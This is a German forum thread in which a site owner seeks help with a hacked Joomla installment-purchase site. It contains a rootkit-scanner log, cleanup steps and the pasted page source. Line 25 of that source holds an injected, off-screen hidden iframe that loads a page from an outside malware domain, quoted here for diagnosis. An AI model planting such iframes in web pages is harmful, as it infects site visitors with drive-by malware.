16:58:14.0640 2464  [ A28CE25B59C90E12743001A1F2AE3613 ] C:\WINDOWS\system32\winsrv.dll

16:58:14.0656 2464  [ A28CE25B59C90E12743001A1F2AE3613 ] C:\WINDOWS\system32\winsrv.dll

16:58:14.0687 2464  [ A3EDBE9053889FB24AB22492472B39DC ] C:\WINDOWS\system32\services.exe

16:58:14.0687 2464  [Global] - ok

16:58:14.0687 2464  ================ Scan MBR ==================================

16:58:14.0703 2464  [ 72B8CE41AF0DE751C946802B3ED844B4 ] \Device\Harddisk0\DR0

16:58:15.0000 2464  \Device\Harddisk0\DR0 - ok

16:58:15.0000 2464  ================ Scan VBR ==================================

16:58:15.0015 2464  [ 728B359927AC7F16427987B2587A1008 ] \Device\Harddisk0\DR0\Partition1

16:58:15.0015 2464  \Device\Harddisk0\DR0\Partition1 - ok

16:58:15.0031 2464  [ 9157A432AF5D13FBB04FCA9245C93161 ] \Device\Harddisk0\DR0\Partition2

16:58:15.0031 2464  \Device\Harddisk0\DR0\Partition2 - ok

16:58:15.0031 2464  ============================================================

16:58:15.0031 2464  Scan finished

16:58:15.0031 2464  ============================================================

16:58:15.0140 2844  Detected object count: 11

16:58:15.0140 2844  Actual detected object count: 11

16:58:43.0484 2844  C:\WINDOWS\system32\DRIVERS\AegisP.sys - copied to quarantine

16:58:43.0562 2844  AegisP ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:43.0625 2844  C:\Programme\Broadcom\BACS\BASFND.sys - copied to quarantine

16:58:43.0640 2844  BASFND ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:43.0671 2844  C:\Programme\Broadcom\BACS\BPowMon.exe - copied to quarantine

16:58:43.0687 2844  BPowMon ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:43.0750 2844  C:\Programme\Lenovo\Bluetooth Software\bin\btwdins.exe - copied to quarantine

16:58:43.0765 2844  btwdins ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:43.0796 2844  C:\Programme\Intel\Wireless\Bin\EvtEng.exe - copied to quarantine

16:58:43.0859 2844  EvtEng ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:43.0937 2844  C:\WINDOWS\system32\FpLogonServ.exe - copied to quarantine

16:58:43.0984 2844  FingerprintServer ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:44.0000 2844  C:\Programme\Mobile Partner\UpdateDog\ouc.exe - copied to quarantine

16:58:44.0046 2844  Mobile Partner. RunOuc ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:44.0125 2844  C:\Programme\Lenovo\PM Driver\PMSveH.exe - copied to quarantine

16:58:44.0171 2844  PMSveH ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:44.0203 2844  C:\Programme\Intel\Wireless\Bin\RegSrvc.exe - copied to quarantine

16:58:44.0234 2844  RegSrvc ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:44.0375 2844  C:\Programme\Intel\Wireless\Bin\S24EvMon.exe - copied to quarantine

16:58:44.0437 2844  S24EventMonitor ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

16:58:44.0453 2844  C:\WINDOWS\system32\DRIVERS\s24trans.sys - copied to quarantine

16:58:44.0453 2844  s24trans ( UnsignedFile.Multi.Generic ) - User select action: Quarantine 

17:08:11.0921 3744  Deinitialize successa

klar ists "schlimm" hatte ja skip geschrieben.
musst dann mal treiber updaten von der hersteller seite.
gibt avast noch fehler aus?

Hi Markus,

1. mit den Treibern mach ich. Obwohl in der Systemsteuerung keinerlei fehler auftreten.

2. Nein, keine Fehlermeldung - das bedeutet system sauber ?

Edit:

Komischerweise meldet sich Avast, wenn ich die Conifixx Seite des Hosters besuche. Dort liegt auch die betroffene Seite

Hi Markus,

es muss an der Datenbank gelegen haben (log-file von Avast habe ich angehängt)

Man muss meine DB gehackt haben und dort wurden dann auch die links hinterlegt. Daher die Fehlermeldung, als ich in meinen Confixx Bereich ging.

Hoffe ich interpretiere es richtig - Was denkst du ?

nach dem ich die DB rausgeschmissen habe, kam die Avast Fehlermeldung nicht mehr.

Ich würde jetzt erstmals alle PWs ändern bevor ich die Backups einspiele

lg

hi,
und die datenbank neu erstellen bzw ein backup einspielen

Hi Markus,

nach einer Tortur alles wieder hergestellt. Die Fehlermeldung kommt nicht mehr. In den Avast Logs ist auch nichts zu finden. Muss an meienr DB gelegen haben. Habe aber alles gelöscht, wer weiß wo die Backdoors eingefügt hatten.
Surfe nun auch nur mit eingeschränker Berechtigung.

Danke nochmals für deine Tipps Markus

hast du deine verwendete software auf dem server aktualisiert, alle nicht benötigten plugins gelöscht etc?

ja,

Ablauf:

1. Alle gelöscht
2. Passwörter geändert
3. Neuaufgespielt und aktualisiert
4. Plugins und Module, die nicht gebraucht werden gelöscht.

Lasse gerade auch die Seite ratenkauf-24.de von safeweb.norton.com prüfen

Die anderen Scanner haben auch keine Fehlermeldung gegeben. Du kannst ja auch mal checken

Danke danke danke nochmals. Ich werde auch ne ,,Spende" raussenden.

Markus eine Frage,

kann es sein, das er wieder drauf ist. Heute hatte ich wieder die avast meldung, als ich im confixx bereich des Hosters war. Als ich meine Domain überprüft hatte, kam bei einem Scan die Meldung, das noch eine infizierte Domain auf dem Server war.
Kann es ev. daran liegen

lg

bei einem Scan habe ich eine eventuelle Rootkit Warnung erhalten. Ich habe schon den Server admin angeschrieben.Aber kennst du eventuell einen Fachmann, der das machen könnte.

Wäre für Tipps und tarife dankbar

Hier das Resultat

hxxp://urlquery.net/report.php?id=186674

zudem diesen Report:

hxxp://vurldissect.co.uk/default.asp?url=http%3A%2F%2Fwww.ratenkauf-24.de&btnvURL=Dissect&selUAStr=1&selServer=1&ref=&cbxSource=on&cbxBlacklist=on

kannst du die seite mal bei urlquery gegenchecken? geht bei mir momentan leider nicht

urlquery wurde glaube ich zu oft aufgerufen.

Ich sende dir aber mal den Bericht. Es wird immer wieder ein iframe auf der Seite eingebaut. Ich habe gesehen, du hattest schon einmal einen Thread auf dieser Seite diesbezüglich (http://www.trojaner-board.de/119143-...-homepage.html)

Bei mir ist auch der Hoster: top-hoster.de. kann es am Hoster liegen. Ich weiß wahrlich nicht, wo ich ansetzen kann. Der iframe wird irgendwie bei der gooleapis eingefügt.

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hxxp://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

1         <html xmlns="hxxp://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" >

2         <head>

3         

4         <base href="hxxp://www.ratenkauf-24.de/" />

5         <meta http-equiv="content-type" content="text/html; charset=utf-8" />

6         <meta name="robots" content="index, follow" />

7         <meta name="keywords" content="Ratenkauf, Kauf auf Raten, Finanzierung" />

8         <meta name="description" content="✔ Bequem per Ratenkauf &amp; Kauf auf Raten bestellen ✔ Große Auswahl an bekannten Shops ✔ Ratenrechner ✔ Ratgeber &amp; Lexikon für Fachbegriffe" />

9         <meta name="generator" content="Ratenkauf-CMS" />

10         <title>Ratenkauf - Kauf auf Raten</title>

11         <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />

12         <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" />

13         <link rel="stylesheet" href="/media/system/css/modal.css" type="text/css" />

14         <link rel="stylesheet" href="hxxp://www.ratenkauf-24.de/components/com_k2/css/k2.css" type="text/css" />

15         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/grids.css" type="text/css" />

16         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/template.css" type="text/css" />

17         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/typography.css" type="text/css" />

18         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/joomla.css" type="text/css" />

19         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/navigation.css" type="text/css" />

20         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/modules.css" type="text/css" />

21         <link rel="stylesheet" href="/templates/shaper_simplicity_ii/css/styles/style3.css" type="text/css" />

22         <link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />

23         <link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />

24         <link rel="stylesheet" href="/modules/mod_recommend_this/assets/recommend.css" type="text/css" />

25         <script type="text/javascript" src="hxxp://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js"></script><style>.zzzrnb { position:absolute; left:-1357px; top:-1606px} </style> <div class="zzzrnb"><iframe src="hxxp://riad-assllaf.net/46404443.html" width="247" height="510"></iframe></div>

26         <script type="text/javascript" src="/modules/mod_recommend_this/assets/recommend.js"></script>

27         <script type="text/javascript" src="/media/system/js/validate.js"></script>

28         <script type="text/javascript">

29         

30                 window.addEvent('domready', function() {

31         

32                     SqueezeBox.initialize({});

33         

34                     $$('a.modal').each(function(el) {

35                         el.addEvent('click', function(e) {

36                             new Event(e).stop();

37                             SqueezeBox.fromElement(el);

38                         });

39                     });

40                 }); var K2RatingURL = 'hxxp://www.ratenkauf-24.de/';

41         </script>

42         <!--[if lte IE 6]><script src="/plugins/system/J2top/fixed.js" type="text/javascript"></script><![endif]-->

43         <script type="text/javascript">if( MooTools.version >= '1.2' ) {

44             window.addEvent('domready',function() {

45             new SmoothScroll({ duration: 350 }, window);

46             var gototop = $('gototop');

47             gototop.setStyle('opacity','0').setStyle('display','block');

48             });

49             window.addEvent('scroll',function(e) {

50                 var gototop = $('gototop');

51                 if(Browser.Engine.trident4) {

52                     gototop.setStyles({

53                         'position': 'absolute',

54                         'bottom': window.getPosition().y + 10,

55                         'width': 100

56                     });

57                 }

58                 gototop.fade((window.getScroll().y > 150) ? 'in' : 'out')

59             });

60         } else {

61             window.addEvent('domready',function() {

62             $('gototop').setStyle('opacity','0');

63             new SmoothScroll();

64             var Change = new Fx.Style('gototop', 'opacity', {duration:350});

65             var scroll = window.getScrollTop();

66             if (scroll > 150){

67                 if ($('gototop').getStyle('opacity','0') == 0){Change.start(1);$('gototop').setStyle('display','');}

68             }

69             });

70             window.addEvent('scroll',function(e) {

71             var scroll = window.getScrollTop();

72             var Change = new Fx.Style('gototop', 'opacity', {duration:350});

73             function Show(){ $('gototop').setStyle('display','');}

74             function Hide(){ setTimeout("$('gototop').setStyle('display','none')",350);}

75             if (scroll > 150){

76                 if ($('gototop').getStyle('opacity','0') == 0){Show();Change.start(1);}

77             } else {

78                 if ($('gototop').getStyle('opacity','1') == 1){Change.start(0);Hide();}

79             }

80             });

81         }

82         </script>

83         <style type="text/css">

84         .preload {display:none;}

85         #gototop{

86         width: 22px;

87         height: 22px;

88         position: fixed;

89         right: 5px;

90         bottom:5px;

91         z-index:1000000;

92         }

93         #top {

94         position:absolute;

95         top:0;

96         left:0;

97         }

98         #gototop_link {

99         text-decoration:none;

100         border: 0 none;

101         outline-width:0;

102         }

103         #gototop_button{

104         cursor: pointer;

105         background: url(hxxp://www.ratenkauf-24.de/images/nach_oben.png) no-repeat scroll 0px 0px;

106         background-color: transparent;

107         color: #000000;

108         font-size: 0px;

109         height: 22px;

110         padding-top: 0px;

111         padding-right: 0px;

112         padding-bottom:0px;

113         padding-left: 0px;

114         text-align: center;

115         width: 22px;

116         display: block;

117         }

118         #gototop_button:hover,#gototop_button:focus,#gototop_button:active, a:hover #gototop_button{

119         color: #4D87C7;

120         background: url(hxxp://www.ratenkauf-24.de/images/nach_oben.png) no-repeat scroll 0px 0px;

121         background-color: transparent;

122         }

123         </style>

124         

125         <link href="/templates/shaper_simplicity_ii/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />

126         

127         </head>

128         <body class="bg"><a id="top"></a>

129                     <div class="preload"><img src="hxxp://www.ratenkauf-24.de/images/nach_oben.png" alt="gototop"/><img src="hxxp://www.ratenkauf-24.de/images/nach_oben.png" alt="gototop"/>

130                     </div>

131                     <div id="gototop" style="display:none"><a id="gototop_link" href="hxxp://www.ratenkauf-24.de/#top" title="nach Oben"><span id="gototop_button">nach Oben</span></a></div>

132         <div id="topofpage"></div>

133         <div class="bg1 clearfix">

134         <div class="sp-container clearfix">

135             <div class="main-bg">

136             <div id="header" class="clearfix">

137                 <a id="logo" href="/"></a>    

138                 <!--Start search-->

139                             

140             </div>

141             <!--Start hornav-->

142                     <div class="clr"></div>

143                 <div id="hornav" class="clearfix">

144                     <ul class="menu"><li class="first active current"><a href="hxxp://www.ratenkauf-24.de/"><span>Ratenkauf 24</span></a></li><li><a href="/online-shopping.html"><span>Shopliste</span></a></li><li><a href=&qu

ot;/ratenkauf-ratgeber.html"><span>Ratgeber</span></a></li><li><a href="/markenshops.html"><span>Markenshops</span></a></li><li class="last"><a href="/ratenrechner.html"><span>Ratenrechner</span></a></li></ul>           &n

bsp;                    

145                 </div>    

146                 

147             <!--End hornav-->

148         

149         <!--breadcrumbs oben-->

150             

151                 <div id="breadcrumb" class="clearfix">

152                     <div class="sp-padding2">

153                         <span style="font-size:12px;font-weight:bold;">Aktuelle Seite :  </span><span class="breadcrumbs">

154         <span class="current">Startseite</span></span>                 

155                         

156                     </div>    

157                 </div>    

158             

159         <!-- ende breadcrumbs oben-->

160         

161             <!--Module Position slides        

162             -->    

163             

164             <!--Module Position user1 to user4

165             -->

166         

167             

168                     <div id="left" class="sp-grid-3 fixHeight clearfix">

169                     <div class="sp-inner">

170                                 <div class="moduletable">

171                     <div class="mod-inner">        

172                         

173                             

174         <div class="recommendthis">

175                                         <a href="#" id="toggleFormLink" name="toggleFormLink"> Freunden Empfehlen </a>

176             </div>

177         

178         

179         

180         

181         

182         <form class="form-validate" onSubmit="return validate(this);" id="frm_recommend" name="frm_recommend" action="" method="post">

183                                 <div class="hiddenDiv">

184                                     

185                                     <div class="spLabel"><label for="txtName"> Ihr Name </label></div>

186                                     <div class="spField"><input type="text" id="txtName" name="txtName" class = "required inputField" /> </div>

187                                     

188                                     <div class="spLabel"><label for="txtEmail"> Ihre E-Mail </label></div>

189                                     <div class="spField"><input type="text" id="txtEmail" name="txtEmail" class = "required inputField validate-email" /></div>                       &nb

sp;    

190                                     

191                                     <div class="spLabel"><label for="txtMessage"> Nachricht </label></div>

192                                     <div class="spField"><textarea id="txtMessage" name="txtMessage" rows="5" class = "required inputField" /></textarea></div>                      &nb

sp;                                 

193                                     

194                                     <div class="spLabel"><label for="txtRecipients"> Mail des Empf&auml;ngers </label></div>

195                                     <div class="spField">

196                                         <input type="text" id="txtRecipients[]" name="txtRecipients[]"    class="required inputField validate-email" />

197                                         <input type="hidden" id="row_count" name="row_count" value="1" />

198                                     </div>                                                     &n

bsp;  

199         

200                                     <div class="spField">

201                                         <input type="hidden" id="counter" name="counter" value="0" />

202                                         <input type="submit" id="action" name="action" value="Send" class="actionButton" />

203                                         <input type="button" id="addMoreButton" name="addMoreButton" value="Mehr" class="actionButton" />

204                                     </div>

205         

206                                 </div>

207                             </form>                <div class="clr"></div>

208                     </div>

209                 </div>

210                 <div class="gap"></div>

211                     <div class="moduletable">

212                     <div class="mod-inner">        

213                                         <h3>            

214                             <span>Haupt</span> Bereiche                    </h3>

215                             <div class="clr"></div>

216                             

217                         <ul class="menu"><li class="first"><a href="/autoteile-finanzkauf.html"><span>Autoteile &amp; Reifen</span></a></li><li><a href="/computer-ratenzahlung.html"><span>Computer &amp; Netbook</span></a></li><

li><a href="/fernseher.html"><span>Fernseher &amp; TV</span></a></li><li><a href="/handy-auf-raten.html"><span>Handy &amp; Mobilfunk</span></a></li><li><a href="/technik-per-ratenkauf.html"><span>Haushalt &amp; Technik</span></a></li><li>

<a href="/mode-auf-raten.html"><span>Mode &amp; Schuhe</span></a></li><li><a href="/moebel.html"><span>Möbel &amp; Wohnen</span></a></li><li><a href="/sale.html"><span>Sales &amp; Schnäppchen</span></a></li><li><a href="/spielzeug-kaufaufraten.html"><span>Spielzeug</span></a></li><li class="last"><a href="/versandhaus-per-ratenkauf.html"><span>Versandhaus</span></a></li></ul>                <div class="clr"></div>

218                     </div>

219                 </div>

220                 <div class="gap"></div>

221                     <div class="moduletable">

222                     <div class="mod-inner">        

223                                         <h3>            

224                             <span>Aktuelle</span> Beiträge                    </h3>

225                             <div class="clr"></div>

226                             

227                         

228         <div id="k2ModuleBox128" class="k2ItemsBlock ">

229         

230             

231              <ul>

232         <li class="even">

233         

234         <!-- Plugins: BeforeDisplay -->

235         

236         <!-- K2 Plugins: K2BeforeDisplay -->

237         

238         

239         <a class="moduleItemTitle" href="/moebel/item/1399-kauf-unique.html">Kauf-Unique</a>

240         

241         

242         <!-- Plugins: AfterDisplayTitle -->

243         

244         <!-- K2 Plugins: K2AfterDisplayTitle -->

245         

246         <!-- Plugins: BeforeDisplayContent -->

247         

248         <!-- K2 Plugins: K2BeforeDisplayContent -->

249         

250         

251         

252         <div class="clr"></div>

253         

254         

255         <div class="clr"></div>

256         

257         <!-- Plugins: AfterDisplayContent -->

258         

259         <!-- K2 Plugins: K2AfterDisplayContent -->

260         

261         

262         

263         

264         

265                     

266                     

267                                 <a class="moduleItemReadMore" href="/moebel/item/1399-kauf-unique.html">

268                         weiterlesen...            </a>

269                     

270         <!-- Plugins: AfterDisplay -->

271         

272         <!-- K2 Plugins: K2AfterDisplay -->

273         

274         <div class="clr"></div>

275         </li>

276         <li class="odd">

277         

278         <!-- Plugins: BeforeDisplay -->

279         

280         <!-- K2 Plugins: K2BeforeDisplay -->

281         

282         

283         <a class="moduleItemTitle" href="/moebel/item/1398-luxor.html">luxor</a>

284         

285         

286         <!-- Plugins: AfterDisplayTitle -->

287         

288         <!-- K2 Plugins: K2AfterDisplayTitle -->

289         

290         <!-- Plugins: BeforeDisplayContent -->

291         

292         <!-- K2 Plugins: K2BeforeDisplayContent -->

293         

294         

295         

296         <div class="clr"></div>

297         

298         

299         <div class="clr"></div>

300         

301         <!-- Plugins: AfterDisplayContent -->

302         

303         <!-- K2 Plugins: K2AfterDisplayContent -->

304         

305         

306         

307         

308         

309                     

310                     

311                                 <a class="moduleItemReadMore" href="/moebel/item/1398-luxor.html">

312                         weiterlesen...            </a>

313                     

314         <!-- Plugins: AfterDisplay -->

315         

316         <!-- K2 Plugins: K2AfterDisplay -->

317         

318         <div class="clr"></div>

319         </li>

320         <li class="even">

321         

322         <!-- Plugins: BeforeDisplay -->

323         

324         <!-- K2 Plugins: K2BeforeDisplay -->

325         

326         

327         <a class="moduleItemTitle" href="/versandhaus-per-ratenkauf/item/1397-juwedi.html">juwedi</a>

328         

329         

330         <!-- Plugins: AfterDisplayTitle -->

331         

332         <!-- K2 Plugins: K2AfterDisplayTitle -->

333         

334         <!-- Plugins: BeforeDisplayContent -->

335         

336         <!-- K2 Plugins: K2BeforeDisplayContent -->

337         

338         

339         

340         <div class="clr"></div>

341         

342         

343         <div class="clr"></div>

344         

345         <!-- Plugins: AfterDisplayContent -->

346         

347         <!-- K2 Plugins: K2AfterDisplayContent -->

348         

349         

350         

351         

352         

353                     

354                     

355                                 <a class="moduleItemReadMore" href="/versandhaus-per-ratenkauf/item/1397-juwedi.html">

356                         weiterlesen...            </a>

357                     

358         <!-- Plugins: AfterDisplay -->

359         

360         <!-- K2 Plugins: K2AfterDisplay -->

361         

362         <div class="clr"></div>

363         </li>

364         <li class="odd">

365         

366         <!-- Plugins: BeforeDisplay -->

367         

368         <!-- K2 Plugins: K2BeforeDisplay -->

369         

370         

371         <a class="moduleItemTitle" href="/neobuy.html">neobuy</a>

372         

373         

374         <!-- Plugins: AfterDisplayTitle -->

375         

376         <!-- K2 Plugins: K2AfterDisplayTitle -->

377         

378         <!-- Plugins: BeforeDisplayContent -->

379         

380         <!-- K2 Plugins: K2BeforeDisplayContent -->

381         

382         

383         

384         <div class="clr"></div>

385         

386         

387         <div class="clr"></div>

388         

389         <!-- Plugins: AfterDisplayContent -->

390         

391         <!-- K2 Plugins: K2AfterDisplayContent -->

392         

393         

394         

395         

396         

397                     

398                     

399                                 <a class="moduleItemReadMore" href="/neobuy.html">

400                         weiterlesen...            </a>

401                     

402         <!-- Plugins: AfterDisplay -->

403         

404         <!-- K2 Plugins: K2AfterDisplay -->

405         

406         <div class="clr"></div>

407         </li>

408         <li class="even lastItem">

409         

410         <!-- Plugins: BeforeDisplay -->

411         

412         <!-- K2 Plugins: K2BeforeDisplay -->

413         

414         

415         <a class="moduleItemTitle" href="/betten-braun.html">Betten Braun</a>

416         

417         

418         <!-- Plugins: AfterDisplayTitle -->

419         

420         <!-- K2 Plugins: K2AfterDisplayTitle -->

421         

422         <!-- Plugins: BeforeDisplayContent -->

423         

424         <!-- K2 Plugins: K2BeforeDisplayContent -->

425         

426         

427         

428         <div class="clr"></div>

429         

430         

431         <div class="clr"></div>

432         

433         <!-- Plugins: AfterDisplayContent -->

434         

435         <!-- K2 Plugins: K2AfterDisplayContent -->

436         

437         

438         

439         

440         

441                     

442                     

443                                 <a class="moduleItemReadMore" href="/betten-braun.html">

444                         weiterlesen...            </a>

445                     

446         <!-- Plugins: AfterDisplay -->

447         

448         <!-- K2 Plugins: K2AfterDisplay -->

449         

450         <div class="clr"></div>

451         </li>

452         <li class="clearList"></li>

453         </ul>

454         

455             

456             

457         </div>                <div class="clr"></div>

458                     </div>

459                 </div>

460                 <div class="gap"></div>

461                     <div class="moduletable">

462                     <div class="mod-inner">        

463                                         <h3>            

464                             <span>Copy</span> Scape                    </h3>

465                             <div class="clr"></div>

466                             

467                         <p><img src="hxxp://logos.kauf-auf-rechnung24.com/copyscape.gif" border="0" style="margin: 0pt 0pt 0pt 10px;" /></p>                <div class="clr"></div>

468                     </div>

469                 </div>

470                 <div class="gap"></div>

471             

472                     </div>

473                 </div>

474                 

475             <div id="contents" class="sp-grid-9 fixHeight clearfix">    

476         <!--Module position datamenu artikel-->

477         

478         <!--Module Position slides-->        

479                 <div class="clr"></div>

480             <!--Component Area-->

481             <div class="sp-inner-content">

482                 

483                 

484         

485         <div class="blog">

486         

487                     <div class="leading">

488                     

489         

490         

491         

492         

493         

494         

495         

496         <span style="margin: 0 0 5px 0"><div class="fb-like" data-href="hxxp://www.ratenkauf-24.de" data-send="false" data-width="520" data-show-faces="true"></div></span><span style="float:right"><a href="hxxp://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="Ratenkauf1" data-lang="de">Tweet

</a><script type="text/javascript" src="hxxp://platform.twitter.com/widgets.js"></script><g:plusone></g:plusone></span>

497         <img src="hxxp://logos.ratenkauf-24.de/ratenkauf.jpg" border="0" alt="Kauf auf Raten" title="Technik und mehr auf Raten bestellen" style="margin: 0pt 0pt 5px 15px; border: 0pt none;" />

498         <h1>Ratenkauf &amp; Kauf auf Raten</h1>

499         <ul>

500         <li>Diese Themenseite hat sich auf den Fachbereich Ratenkauf spezialisiert.</li>

501         <li>Sie finden in den einzelnen Kategorien eine große Anzahl an namhaften Onlineshops. </li>

502         <li>Große Auswahl zu den Themen Mode, Technik, Möbel, Auto, Handy, Computer, Fernseher und mehr. </li>

503         <li>Sie haben relevante Infos ? Dann senden Sie die uns per <a href="/kontakt.html">Kontaktformular</a>.</li>

504         </ul>

505         

506         <div class="clr"></div>

507         <div class="clr"></div>

508         <span class="article_separator"></span>

509                 </div>

510             

511             <div class="items"><div class="single col1"><div class="item-inner">

512         

513         

514         

515         

516         

517         

518         

519         <h3>Übersicht mit Ratenzahlung Shops</h3>

520         <table style="margin:5px 0 0 25px;" border="0">

521         <tbody>

522         <tr>

523         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/online-shopping.html">Alle Onlineshops</a></td>

524         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/mode-auf-raten.html">Mode &amp; Schuhe</a></td>

525         </tr>

526         <tr>

527         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/fernseher.html">Fernseher &amp; Elektronik</a></td>

528         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/computer-ratenzahlung.html">Computer &amp; Laptops</a></td>

529         </tr>

530         <tr>

531         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/technik-per-ratenkauf.html">Technik &amp; Haushalt</a></td>

532         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/handy-auf-raten.html">Handy &amp; Mobilfunk</a></td>

533         </tr>

534         <tr>

535         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/moebel.html">Möbel &amp; Lifestyle</a></td>

536         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/autoteile-finanzkauf.html">Autoteile &amp; Zubehör</a></td>

537         </tr>

538         <tr>

539         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/versandhaus-per-ratenkauf.html">Versandhäuser auf Raten</a></td>

540         <td width="350"><img src="hxxp://logos.ratenkauf-24.de/button.png" border="0" width="12" height="10" style="border: 0pt none;" /><a href="/spielzeug-kaufaufraten.html">Spielzeug &amp; Kinderartikel</a></td>

541         </tr>

542         </tbody>

543         </table>

544         

545         <div class="clr"></div>

546         <div class="clr"></div>

547         <span class="article_separator"></span>

548         

549         

550         

551         

552         

553         

554         

555         

556         <h3 style="margin:10px 0 5px 0;">Ihre Vorteile im Überblick</h3>

557         <p><em><strong>Wie funktioniert Kauf auf Raten ?<br /></strong></em></p>

558         <ul>

559         <li>Der Ratenkauf, oder auch als Finanzkauf bekannt, wird von vielen Onlineshops in den unterschiedlichsten Kategorie angeboten. Sie können heutzutage Möbel, Mode, Schuhe, Elektronik, Computer, Kosmetik und vieles mehr bequem auf Raten kaufen. Für diese bequeme Form der Zahlung benötigt der Shopbetreiber selbstverständlich einige Daten des Kunden. Neben den üblichen Infos wie Bankverbindung und Anschrift kann der Shop persönliche Auskünfte über

die Schufa einholen und eine Bonitätsprüfung veranlassen. Natürlich ist bei dieser Abwicklung der Anbieter an gesetzliche Richtlinien wie z.B. dem Datenschutz gebunden. Für dieses Verfahren arbeiten viele Onlineshops mit professionellen Partnern, die sich auf diesen Service spezialisiert haben. Für den Kunden ändert sich bei der Bestellabwicklung aber nichts. Hat man Ratenzahlung beim Online-Einkauf gewählt, werden die Daten an den Servicepartner übermitt

elt, der Ihnen zeitnah ein attraktiven Angebot unterbreitet. Ist man mit den Konditionen einverstanden kommt es zum Kauf und die bestellten Artikel werden an die Lieferadresse versandt. </li>

560         </ul>

561         <p><em><strong>Ist Ratenkauf sinnvoll ?<br /></strong></em></p>

562         <ul>

563         <li>Wer kennt nicht das Problem der ,,Liquiditätsengpässe“. Ein wichtiger Anlass steht vor der Tür und es fehlt am nötigen Kleingeld. Da macht es Sinn den Einkauf auf Raten zu tätigen. Man erhält die Waren und zahlt in vereinbarten Abschlägen den Gesamtbetrag ab. Attraktive Zinskonditionen verstärken aktuell sogar den Trend des Ratenkaufs. Dabei lässt diese Zahlungsform nicht unbedingt auf finanzielle Not schließen. Beispielweise erh

alten besonders zur Weihnachtszeit viele Onlineshops Anfragen auf dieses begehrte Zahlverfahren. Die Kunden wollen sich hierbei Ihre Wünsche erfüllen und dennoch finanziellen Spielraum haben. Besonders bei teuren Anschaffungen neigen die Kunden verstärkt zum Kauf auf Raten. Beim Kauf von hochwertigen Möbeln oder Elektrogeräten kann sich schnell ein beachtlicher Betrag summieren. Diese ,,Kleinkredite“ sind schnell abgewickelt und recht übersichtlich in Ihren Ko

nditionen. Aus diesem Grund suchen viele Onlineshopper speziell nach Anbietern die diese Art der Zahlung anbieten. </li>

564         </ul>

565         <p><em><strong>Ist Ratenzahlung empfehlenswert ?<br /></strong></em></p>

566         <ul>

567         <li>Pauschal kann man diese Frage nicht beantworten. Jeder Einzelne muss sich selbst im Klaren seiner Finanzlage sein und beim Kauf abwägen, welche Zahlungsmodalität am Besten geeignet ist. Bei finanziellen Engpässen oder bei der Erfüllung eines langersehnten Wunsches, wie z.B. die Traumreise, kann Ratenzahlung die ideale Option sein. Der Wunsch wird sofort erfüllt, aber man zahlt die Rechnung in angemessen Teilbeträgen über einen vereinbarten Zeitraum. S

o ist jeder imstande sich einen Hauch von Luxus zu gönnen. Die bequeme Finanzierung durch Kauf auf Raten lässt keinen Wunsch unerfüllt. Durch den geringen Zinsaufschlag erhöht sich im Endeffekt der Gesamtbetrag, der ist aber zu verkraften, da derzeit viele attraktive Konditionen am Markt erhältlich sind. Zudem muss man nicht alles auf einmal zahlen sondern komfortabel über einen selbstbestimmten Zeitraum.<br /> <br /> Um in den Genuss von Ratenkauf zu ko

mmen sind relevante Dinge zu beachten. Hat man ein geregeltes Einkommen und eine einwandfreie Bonität, sprich keinerlei negative Einträge in Verzeichnissen wie der Schufa, braucht man in der Regel nicht zu befürchten dass der Antrag nicht akzeptiert wird. Abschließend bleibt zu erwähnen, dass man unbedingt auf die Vertragskonditionen achten sollte. Angebote mit hohen Ratenzinsen und sehr langen Laufzeiten erhöhen den Gesamtbetrag erheblich. Auf diesem Portal werden

seriöse und bekannte Online-Shops angeboten, die faire und marktübliche Konditionen anbieten. Dennoch macht ein Kauf keinen Sinn, wenn man nicht in der Lage ist die Rechnung zu zahlen. Ein Wunschartikel wird dann schnell zum Alptraum. Also ziehen Sie immer Ihre finanziellen Möglichkeiten beim Online-Shopping in Betracht. </li>

568         </ul>

